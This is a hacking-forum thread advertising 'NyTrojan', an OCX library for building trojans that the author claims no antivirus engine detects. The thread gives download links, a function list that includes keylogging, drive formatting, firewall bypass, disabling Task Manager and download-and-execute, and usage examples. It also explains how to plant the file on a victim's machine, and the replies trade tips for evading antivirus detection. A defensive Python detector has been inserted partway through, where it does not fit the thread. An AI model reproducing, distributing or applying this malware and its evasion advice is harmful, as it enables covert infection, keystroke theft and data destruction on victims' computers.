Nytro

[RST] NyTrojan v1.02 FUD


::::: NyTrojan OCX :::::::

:::::: © Nytro 2008 :::::::

::: http://rstcenter.com :::

Same nonsense, 100% undetectable, the product of having nothing better to do.

File : NyTrojan.OCX

Size : 76.0 KB

Download :

http://rapidshare.com/files/122825689/NyTrOjan.ocx

http://www.speedyshare.com/396218378.html

Functions:

1) OpenCDRom

2) CloseCDRom

3) ShowTaskBar

4) HideTaskBar

5) HideMouse

6) ShowMouse

7) LockExe

8) UnLockExe

9) HideClock

10) ShowClock

11) HideStart

12) ShowStart

13) HideIcons

14) ShowIcons

15) DisableTaskManager

16) EnableTaskManager

17) EmptyFolder

18) DesktopFolderFlood

19) DesktopFolderDelete

20) DisableSystemRestore

21) EnableSystemRestore

22) KillProcess

23) AutoDownload

24) SetStartButtonCaption

25) AddToStartUp

26) FreezeMouse

27) StopFreezeMouse

28) CrazyMouse

29) StopCrazyMouse

30) BeepFlood

31) StopBeepFlood

32) Abort

33) LogOff

34) ShutDown

35) Restart

36) Author

37) OpenWebSite

38) FormatDrive

39) SwapMouseButtons

40) StopSwapMouseButtons

41) BypassWindowsFirewall

42) TurnOffMonitor

43) TurnOnMonitor

44) StartKeylogging

45) StopKeylogging

46) Keylog

Why use it? Because it greatly simplifies your work.

I haven't made a trojan with it yet; I'll come back with one, I'm going to make it.

Using these functions, the trojan is 100% UD.

I tried them on myself and the functions worked; try them yourselves too, and if a function doesn't work, let me know.

Pay attention to the number of parameters each function takes; I'll come back with an edit in which I explain what each function does and how it is used.

I also scanned it:

File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/33 (0%)

http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d

Note: if you use this OCX, the file has to be present on the victim's computer. How can that be done? The simplest way is an SFX archive made with WinRAR. The OCX must be located in system32.

How do you use it in Visual Basic? It must be registered:

Run >> regsvr32.exe C:\...\NyTrojan.OCX

Or press CTRL + T in Visual Basic / Components, and click Browse.

If you have problems, suggestions, etc., post below.

The OCX's functions:

1. DesktopFolderFlood = Creates 1000 folders on the desktop

2. DesktopFolderDelete = Deletes the folders

3. EmptyFolder = Deletes all the files in a folder

Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32"

4. KillProcess = Closes a process

Ex. NyTrojan1.KillProcess "winamp.exe"

5. AutoDownload = Downloads a file

Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1

Parameters: 1. Direct link, 2. Location, 3. Run afterwards?

1 - To run it after download

0 - To not run it after download

6. SetStartButtonCaption = Sets the caption of the Start button

Ex. NyTrojan1.SetStartButtonCaption "xxx"

7. AddToStartUp = Adds a program to start-up

Ex. NyTrojan1.AddToStartUp "C:\x.exe"

8. BeepFlood = Continuous beeps

Ex. NyTrojan1.BeepFlood "100"

The parameter is the interval between beeps

9. OpenWebSite = Opens a website with IE

Ex. NyTrojan1.OpenWebSite "http://www.google.ro"

10. Author = A MsgBox

11. FormatDrive = Formats a partition

Ex. NyTrojan1.FormatDrive "a"

Info: I only tried it on A:\, not on C:\ or D:\

12. StartKeylogging = Starts keylogging

13. StopKeylogging = Stops keylogging

14. Keylog = Returns the keylog, the keys pressed after the StartKeylogging function was called

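Seen from the detection side, the deployment steps in the post above (an OCX placed in system32, registered with regsvr32, delivered by a WinRAR SFX) leave a recognisable process-creation trail. The following is an added example, not part of the original thread; the event records, field names (Sysmon Event ID 1 style), the `RarSFX0` temp path and the trusted-parent allow-list are constructed assumptions.

```python
import ntpath
import re

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\NyTrojan.OCX",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\RarSFX0\setup.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe "C:\Program Files\Vendor\grid.ocx"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u C:\Windows\System32\old.ocx",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

TRUSTED_PARENTS = {"msiexec.exe", "trustedinstaller.exe"}  # assumed allow-list
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|rarsfx\d+)\\", re.I)
# Quoted path (may contain spaces) or unquoted path ending in .ocx
OCX_ARG = re.compile(r'"([a-z]:\\[^"]+\.ocx)"|([a-z]:\\\S+\.ocx)', re.I)
UNREGISTER = re.compile(r"(^|\s)/u(\s|$)", re.I)

def findings(event):
    """Return the reasons an event looks like an untrusted OCX registration."""
    if ntpath.basename(event["Image"]).lower() != "regsvr32.exe":
        return []
    cmd = event["CommandLine"]
    m = OCX_ARG.search(cmd)
    if not m or UNREGISTER.search(cmd):
        return []  # no .ocx argument, or an unregister call
    target = (m.group(1) or m.group(2)).lower()
    parent = event["ParentImage"]
    reasons = []
    if ntpath.basename(parent).lower() not in TRUSTED_PARENTS:
        if "\\system32\\" in target or "\\syswow64\\" in target:
            reasons.append("ocx-in-system-dir-registered-by-untrusted-parent")
        if USER_WRITABLE.search(parent):
            reasons.append("parent-runs-from-user-writable-path")
    if USER_WRITABLE.search(target):
        reasons.append("ocx-loaded-from-user-writable-path")
    return reasons

def triage(events):
    """Return (command line, reasons) for every event with at least one finding."""
    return [(e["CommandLine"], r) for e in events if (r := findings(e))]
```
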

Sorry for the double post; it was no longer FUD at all, now it is again.

File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/33 (0%)

http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d

Download :

http://rapidshare.com/files/125661266/NyTrOjan.ocx


Nice, that's exactly what I meant :D By the way, it sees the OCX and the res files as viruses ... unfortunately ... Try with modules and the source code directly in the executable; that way you can still fool the antivirus programs, at least for now ..

PS: Please send me a private message with your messenger ID so we can talk more easily about certain things :D


I don't really understand antivirus products. I ran some tests with Digital Keylogger. The way I made it the first time, 4 antivirus products detected it. I removed the OCX self-copying from the code and I think 5 found it. Then I deleted all the code from the form and left only the declarations and a module that writes to the registry with RegOpenKey ... and 7 antivirus products found it. I deleted pieces of the code and it was still detectable. I tried without the self-copying and BitDefender still flagged it as a dropper. I don't really understand how this works.


In my case at least, I scanned the trojan with VirusTotal just now (and speaking of that, it doesn't mean that antivirus products will detect it in the future, a fact I have verified myself). It has 31-32 antivirus products in the list and .. of those only 3 currently see it as a suspicious file (nod32, sophos and panda), but none as a definite virus. If I remove the auto start-up code, only panda sees it, again as a suspicious file. Anyway .. that was before; I have updated it since then and haven't checked it again, but I fixed some bugs and added the code for a single instance (process), etc. In any case, that has no way of affecting the code. In your case I get the impression that the whole problem revolves around the OCX. Try including the commands in the program, so that you don't rely on the nytro ocx ;)

Edit: I checked just now and I see that BitDefender has finally caught it too ... As a fix, we should first of all change the code for the registry entry. Anyway, 4 out of 33 (as of now) is something, for a start.


You don't have to give it to them; you put it in a resource file in the server.

' Win32 SendMessage, used here to send a system command to the control's own window
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Const WM_SYSCOMMAND = &H112&
Private Const SC_MONITORPOWER = &HF170&

' Sends WM_SYSCOMMAND / SC_MONITORPOWER with lParam = 1
Public Function TurnOffMonitor()
    SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 1&
End Function

' Sends WM_SYSCOMMAND / SC_MONITORPOWER with lParam = 0
Public Function TurnOnMonitor()
    SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 0&
End Function
